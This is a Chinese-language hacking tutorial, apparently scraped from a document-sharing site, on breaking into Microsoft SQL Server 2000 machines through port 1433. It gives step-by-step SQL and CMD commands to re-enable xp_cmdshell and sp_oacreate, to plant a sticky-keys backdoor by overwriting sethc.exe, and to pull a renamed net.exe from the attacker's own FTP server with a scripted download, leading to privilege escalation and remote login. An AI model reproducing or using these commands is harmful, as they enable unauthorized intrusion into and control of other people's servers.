您的位置:360文档中心› 利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器

相关主题
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

利用SQL之1433端口巧妙入侵服务器

利用1433端口提权

相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net 没权限情况的提权方法;

1、未找到储存过程!那就来修复下吧!

用到SQL语句:

xp_cmdshell新的恢复办法

第一步先删除:

drop procedure sp_addextendedproc

drop procedure sp_oacreate

exec sp_dropextendedproc 'xp_cmdshell'

第二步恢复:

dbcc addextendedproc ("sp_oacreate","odsole70.dll")

dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

直接恢复,不管sp_addextendedproc是不是存在

图1

2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2

3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL

找到了哈哈!

图3

4、恢复!

用到SQL语句:

第一

exec sp_dropextendedproc 'xp_cmdshell'

第二

dbcc addextendedproc ("xp_cmdshell","d:\应用软件

\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL") 恢复好了

图4

5、提下权net net1 都拒绝访问!管理降低了权限!图5

6、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!

用到CMD命令:

五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.exe

copy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe

图6

7、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:

利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:

declare @o int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o,

'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';

第二:

declare @oo int

exec sp_oacreate 'scripting.filesystemobject', @oo out

exec sp_oamethod @oo,

'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图7

8、这里是本节的重点了!利用传马的方式提权!

首先自己架设一个FTP 或是自己已经有FTP的!

把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!

把FTP传马方式的语句一句一句复制执行DOS命令!

用到CMD命令:

echo open FTP> xiuxiu.txt 注意xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txt

echo 密码>> xxxx.txt

echo binary >> xxxx.txt

echo get net的名字.exe>> xxxx.txt

echo bye >> xxxx.txt

ftp -s:xxxx.txt

del xxxx.txt. /q /f

图8

9、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图9

10、好了!最后一条命令执行成功了!返回以下数据!

注意:服务器必须能上网!

图10

11、我XXxX 我自己的net好象没加权限吧! 居然不能执行

返回了以下数据!发生系统错误5...这很多人都遇见过!

其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!

图11

12、嘿嘿net1后成功了! 提权成功!图12

13、远程登录成功图13

相关文档
最新文档